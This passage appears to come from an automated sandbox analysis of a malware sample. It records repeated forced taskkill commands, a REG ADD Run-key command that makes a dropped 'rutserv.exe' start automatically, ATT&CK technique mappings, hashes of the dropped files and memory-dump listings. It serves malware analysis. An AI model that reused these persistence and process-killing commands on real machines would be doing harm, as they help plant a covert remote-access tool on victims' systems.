C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3860

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:728

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2624

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:4080

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3188

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3240

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:728

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3860

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1296

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2760

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3244

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "serv" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
4⤵
- Adds Run key to start application
PID:3968

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Immunity\install.cmd
MD5
236a980d9785499dbdf8b870fcd8d0eb

SHA1
dbfaa916524301b130cf8d5ff9e3b57c2c36db19

SHA256
c55fcd65dbeef3f54faec759aa17bc13fdbc5eea75985f00c7b50b5020a4b989

SHA512
50faace24163a745f471e8452cecdd6168975d8fc3e79034d854f4317b5984afd78459f5fc00a7c158fabe636d5172ac316dca2fd02769d540242efa5d872b8d

Download Submit
C:\ProgramData\Immunity\libeay32.dll
MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
C:\ProgramData\Immunity\rfusclient.exe
MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
C:\ProgramData\Immunity\rutserv.exe
MD5
1df51dfafb3963a6765a124189ae7739

SHA1
ccc65ed41b9f376a90ffc34912c8cb62888d6315

SHA256
65507616ba266f7c52ec7e8954b4d2f0116d8eac69c4d79ed2def294e9d7e5a4

SHA512
dc629b67c6b81cbd65d24688957c53e1f35b41f627b78e2cfb92487a89e73a830435839328e92c68c49d4d7d8f9b7b9d034f4837c46b76cce1b5cd79ba5abb60

Download Submit
C:\ProgramData\Immunity\rutserv.exe
MD5
1df51dfafb3963a6765a124189ae7739

SHA1
ccc65ed41b9f376a90ffc34912c8cb62888d6315

SHA256
65507616ba266f7c52ec7e8954b4d2f0116d8eac69c4d79ed2def294e9d7e5a4

SHA512
dc629b67c6b81cbd65d24688957c53e1f35b41f627b78e2cfb92487a89e73a830435839328e92c68c49d4d7d8f9b7b9d034f4837c46b76cce1b5cd79ba5abb60

Download Submit
C:\ProgramData\Immunity\rutserv.exe
MD5
1df51dfafb3963a6765a124189ae7739

SHA1
ccc65ed41b9f376a90ffc34912c8cb62888d6315

SHA256
65507616ba266f7c52ec7e8954b4d2f0116d8eac69c4d79ed2def294e9d7e5a4

SHA512
dc629b67c6b81cbd65d24688957c53e1f35b41f627b78e2cfb92487a89e73a830435839328e92c68c49d4d7d8f9b7b9d034f4837c46b76cce1b5cd79ba5abb60

Download Submit
C:\ProgramData\Immunity\settings.dat
MD5
c1b656890595e035fdf19047f1bdd9aa

SHA1
2fe605fad62f8c6f4452fa95ca00da41296f76df

SHA256
1f18d49b858c9f43c1b3ac029a703ff1e4ef2a400131ba161d43a75c31982da9

SHA512
84bf80e7d004e06805fd0f8fca5cde0a75a6e8bc0ddb503e9d557f43f1dc8a3710bb291c9693ab41872d258904da4eb7817dc17df8d1e051fa7a9d46e1cb9661

Download Submit
C:\ProgramData\Immunity\ssleay32.dll
MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N30TL.tmp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
MD5
04362ce81ce3a86f18b3d1c8b7588deb

SHA1
b13c1c60065419575c9a8d85d354e2e63c569914

SHA256
4079f880b226762833bd3ec2726511c1418bff4c0b8bd7f14f2ec03ce9482f54

SHA512
577280b81ab663d1a9489a6ff4d8f7e08d1103bba22bd51309c7e8f8502744358680db415f680a6e8d609a15e16ae4d1f9954d7aca5804002dd21af735c5dcb4

Download Submit
\ProgramData\Immunity\libeay32.dll
MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
\ProgramData\Immunity\libeay32.dll
MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
\ProgramData\Immunity\ssleay32.dll
MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
\ProgramData\Immunity\ssleay32.dll
MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
memory/196-185-0x0000000000000000-mapping.dmp

Download
memory/728-134-0x0000000000000000-mapping.dmp

Download
memory/804-126-0x0000000000000000-mapping.dmp

Download
memory/1044-143-0x0000000000000000-mapping.dmp

Download
memory/1100-170-0x0000000000000000-mapping.dmp

Download
memory/1100-166-0x0000000000000000-mapping.dmp

Download
memory/1204-196-0x0000000000000000-mapping.dmp

Download
memory/1312-118-0x0000000000690000-0x000000000073E000-memory.dmp

Filesize
696KB

Download
memory/1312-116-0x0000000000000000-mapping.dmp

Download
memory/1360-146-0x0000000000000000-mapping.dmp

Download
memory/1384-119-0x0000000000000000-mapping.dmp

Download
memory/1568-176-0x0000000000000000-mapping.dmp

Download
memory/1624-191-0x0000000000000000-mapping.dmp

Download
memory/1624-181-0x0000000000000000-mapping.dmp

Download
memory/1684-187-0x0000000000000000-mapping.dmp

Download
memory/1692-192-0x0000000000000000-mapping.dmp

Download
memory/1692-171-0x0000000000000000-mapping.dmp

Download
memory/1692-160-0x0000000000000000-mapping.dmp

Download
memory/1704-183-0x0000000000000000-mapping.dmp

Download
memory/1736-114-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1824-165-0x0000000000000000-mapping.dmp

Download
memory/1904-147-0x0000000000000000-mapping.dmp

Download
memory/1904-174-0x0000000000000000-mapping.dmp

Download
memory/2112-206-0x0000000000000000-mapping.dmp

Download
memory/2112-201-0x0000000000000000-mapping.dmp

Download
memory/2112-211-0x0000000000000000-mapping.dmp

Download
memory/2180-179-0x0000000000000000-mapping.dmp

Download
memory/2180-188-0x0000000000000000-mapping.dmp

Download
memory/2180-207-0x0000000000000000-mapping.dmp

Download
memory/2180-202-0x0000000000000000-mapping.dmp

Download
memory/2236-164-0x0000000000000000-mapping.dmp

Download
memory/2236-194-0x0000000000000000-mapping.dmp

Download
memory/2236-158-0x0000000000000000-mapping.dmp

Download
memory/2336-212-0x0000000000000000-mapping.dmp

Download
memory/2336-127-0x0000000000000000-mapping.dmp

Download
memory/2412-121-0x0000000000000000-mapping.dmp

Download
memory/2448-162-0x0000000007D60000-0x0000000007D61000-memory.dmp

Filesize
4KB

Download
memory/2448-154-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/2448-144-0x0000000003640000-0x0000000003641000-memory.dmp

Filesize
4KB

Download
memory/2448-148-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/2448-161-0x0000000007C10000-0x0000000007C11000-memory.dmp

Filesize
4KB

Download
memory/2448-137-0x0000000000000000-mapping.dmp

Download
memory/2448-150-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/2448-153-0x0000000005840000-0x0000000005841000-memory.dmp

Filesize
4KB

Download
memory/2448-151-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/2448-156-0x0000000005850000-0x0000000005851000-memory.dmp

Filesize
4KB

Download
memory/2448-163-0x0000000008790000-0x0000000008791000-memory.dmp

Filesize
4KB

Download
memory/2448-157-0x0000000005860000-0x0000000005861000-memory.dmp

Filesize
4KB

Download
memory/2448-168-0x0000000008B20000-0x0000000008B21000-memory.dmp

Filesize
4KB

Download
memory/2448-213-0x00000000032C0000-0x00000000032C1000-memory.dmp

Filesize
4KB

Download
memory/2448-155-0x0000000005FC0000-0x0000000005FC1000-memory.dmp

Filesize
4KB

Download
memory/2480-122-0x0000000000000000-mapping.dmp

Download
memory/2648-140-0x0000000000000000-mapping.dmp

Download
memory/2760-182-0x0000000000000000-mapping.dmp

Download
memory/2780-184-0x0000000000000000-mapping.dmp

Download
memory/3048-197-0x0000000000000000-mapping.dmp

Download
memory/3048-175-0x0000000000000000-mapping.dmp

Download
memory/3064-167-0x0000000000000000-mapping.dmp

Download
memory/3064-210-0x0000000000000000-mapping.dmp

Download
memory/3064-200-0x0000000000000000-mapping.dmp

Download
memory/3064-205-0x0000000000000000-mapping.dmp

Download
memory/3176-172-0x0000000000000000-mapping.dmp

Download
memory/3188-209-0x0000000000000000-mapping.dmp

Download
memory/3188-204-0x0000000000000000-mapping.dmp

Download
memory/3188-199-0x0000000000000000-mapping.dmp

Download
memory/3244-189-0x0000000000000000-mapping.dmp

Download
memory/3500-173-0x0000000000000000-mapping.dmp

Download
memory/3500-169-0x0000000000000000-mapping.dmp

Download
memory/3700-177-0x0000000000000000-mapping.dmp

Download
memory/3736-186-0x0000000000000000-mapping.dmp

Download
memory/3736-178-0x0000000000000000-mapping.dmp

Download
memory/3772-123-0x0000000000000000-mapping.dmp

Download
memory/3772-135-0x00000000018A0000-0x00000000018A1000-memory.dmp

Filesize
4KB

Download
memory/3772-138-0x0000000004FB0000-0x0000000004FB1000-memory.dmp

Filesize
4KB

Download
memory/3772-136-0x00000000038D0000-0x00000000038D1000-memory.dmp

Filesize
4KB

Download
memory/3860-193-0x0000000000000000-mapping.dmp

Download
memory/3896-190-0x0000000000000000-mapping.dmp

Download
memory/3912-159-0x0000000000000000-mapping.dmp

Download
memory/3932-180-0x0000000000000000-mapping.dmp

Download
memory/3972-198-0x0000000000000000-mapping.dmp

Download
memory/3972-208-0x0000000000000000-mapping.dmp

Download
memory/3972-203-0x0000000000000000-mapping.dmp

Download
memory/4080-195-0x0000000000000000-mapping.dmp

Download